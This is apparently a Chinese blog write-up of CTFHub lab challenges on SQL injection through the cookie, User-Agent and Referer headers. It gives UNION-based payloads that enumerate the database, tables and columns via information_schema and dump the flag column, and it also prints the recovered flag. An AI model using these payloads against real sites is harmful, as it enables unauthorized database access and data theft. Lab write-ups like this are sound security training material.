CTFHub技能树-Web-SQL注入

最新推荐文章于 2023-09-23 23:59:30 发布
最新推荐文章于 2023-09-23 23:59:30 发布
阅读量305 收藏 1
点赞数 1
分类专栏: 渗透学习笔记 # 靶场的WP 文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54037445/article/details/128081487
版权

目录

一、cookie注入

1、进题目抓包

2、cookie处存在注入点,判断注入点类型

3、列数和回显位置判断

4、直接获取数据

(1)、表名

 (2)、列名

(3)、flag

二、UA注入

1、抓包看注入点类型

2、其他步骤与cookie注入类似

 flag如下:​

一、cookie注入

1、进题目抓包

2、cookie处存在注入点,判断注入点类型

判断为数字型注入 

3、列数和回显位置判断

使用order by 判断列数为2;

回显位置如下:

4、直接获取数据

(1)、表名

 

 (2)、列名

(3)、flag

flag:ctfhub{a6cfdaf369745f386f20266f}

二、UA注入

1、抓包看注入点类型

 

数字型注入,字段数为2,回显如下:

 

2、其他步骤与cookie注入类似

1、获取数据库名
id=-1 union select 1,database() #

2、获取表名
id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

3、获取列名,我的表名是:afnyhykzod
id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='afnyhykzod'#

4、获取数据,我获取到的列名是:tzbuzzpllg 
id=-1 union select 1,tzbuzzpllg from afnyhykzod #

 flag如下:

 三、Refer注入

1、hackbar勾选Refer

2、在Refer处进行注入,其他步骤类似 

 

star-R
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHUB-web-SQL注入
ookami6497的博客
11-29 717
CTFHUB SQL
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
SqlMap-Sql注入
08-02
Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。 完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。 在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。 支持枚举用户、密码、哈希、权限、角色、数据库、数据表和列。 支持自动识别密码哈希格式并通过字典破解密码哈希。 支持完全地下载某个数据库中的某个表,也可以只下载某个表中的某几列,甚至只下载某一列中的部分数据,这完全取决于用户的选择。 支持在数据库管理系统中搜索指定的数据库名、表名或列名 当数据库管理系统是MySQL、PostgreSQL或Microsoft SQL Server时支持下载或上传文件。 当数据库管理系统是MySQL、PostgreSQL或Microsoft SQL Server时支持执行任意命令并回现标准输出。
WEB漏洞学习-sql注入
06-11
之前文章中的导图文件,由于个人的在线时间导致大家获取困难,现在放在这里供大家自行取用。
php登录页面实现-SQL注入
03-07
php登录页面实现-SQL注入
SQLmap-SQL注入
03-12
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
ctfhub技能树web--sql注入
m0_64636395的博客
05-15 742
SQL 注入是一种将 SQL 代码插入或添加到应用(用户)的输入参数中,之后再将这些参数传递给后台的 SQL 服务器加以解析并执行的攻击。攻击者能够修改 SQL 语句,该进程将与执行命令的组件(如数据库服务器、应用服务器或 WEB 服务器)拥有相同的权限。如果 WEB 应用开发人员无法确保在将从 WEB 表单、cookie、输入参数等收到的值传递给 SQL 查询(该查询在数据库服务器上执行)之前已经对其进行过验证,通常就会出现 SQL 注入漏洞。提示:以下是本篇文章正文内容,下面案例可供参考。
CTFHub-web(SQL注入)
qq_49502930的博客
12-04 223
ctf技能树sql注入
Ctfhub - web -- SQL注入
m0_52920608的博客
01-28 3782
CTFHub sql注入 web mysql python脚本
CTFHUB-WEB-字符型SQL注入
xixihahawuwu的博客
12-24 319
CTFHUB-WEB-字符型SQL注入 我们先就这此题来了解下如何去判断是否是字符串注入 如何去判断 1.加单引号,由于固定情况下,数据库此时的语句为select * from table where name = ‘admin’ ,加入单引号会引起报错,页面不回返 id=1' 2.加入 ?id=1' and 1=1 这里就需要加注释来进行绕过 一开始我想使用#来进行注释,结果发现被网页转码了,我们换一种注释–,为了防止再次被转码,我们在–后面加上+ id=1' and 1=1--+ 3.输入 id=
CTFHub | webSQL注入(整数型注入)
2301_76435948的博客
09-23 202
拿到flag。
vue+element-ui+websql
04-19
使用vue+elemetnui框架,采用websql/localsotrage作为数据存储,实现增删改查
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
cordova-plugin-websql:适用于Windows Phone的Cordova WebSQL插件
05-09
适用于Apache Cordova的WebSQL插件(Windows Phone) 在SQLite库的顶部启用WebSQL功能。 此存储库基于MSOpenTech的。 但是,此插件支持sql的异步执行,其中MSOpenTech的WebSQL插件是完全同步的。 支持平台 该插件仅...
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
CTFHUBsql注入(特详解)
小宇的web博客
06-16 2641
CTFHUBsql注入 1.整数型注入 1.这里我使用的是Hackbar来进行sql注入,首先先判断有没有注入漏洞 加单引号 去掉‘加上and 1=1发现出现了回显 将1=1变为1=2,语句正确但是无法访问数据库 这里可以判定这里存在数字注入漏洞 2.接下来判断字段数量 这里输入id=1 order by 2看是否字段数量是否是2个 3.查询SQL语句插入位置 这里使用联合查询,查询库名。可以在data库中插入sql语句,也就是2的位置 4.获取数据库库名 1)获取当前数据库库名,数据库的名称为
CTF整理】CTFhub技能树-Web-SQL注入
SunnyCat
05-10 2067
CTF整理】CTFhub技能树-Web-SQL注入 目录【CTF整理】CTFhub技能树-Web-SQL注入SQL整数型注入SQL字符型注入SQL报错注入SQL布尔型注入SQL时间注入MySQL结构Cookie注入UA注入Referer注入 SQL整数型注入 确定闭合方式 :1 确定报错位有2个,(我选2注入点) 得到库名 得到表名 得到列名 得到flag SQL字符型注入 确定闭合方式:1’ 【步骤和整形一样,不再使用,我这里采用sqlmap】 核心语法: sqlmap -u "url+参
CTFhub技能树web-SQL注入
Mccc_li的博客
04-05 1224
1.数字型 1 and 1=1 正常输出 1 and 1=2 不输出 存在数字型注入,接下来猜字段 1 order by 1,2输出正常 1 order by 1,2,3不输出,所以有两个字段 1 and 1=2 union select 1,database(),看数据库名字 1,group_concat(table_name)from information_schema.table...
题解记录-CTFHub技能树|Web|SQL注入
weixin_57448435的博客
09-14 2119
数据库注入
ctfhub sql注入
最新发布
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值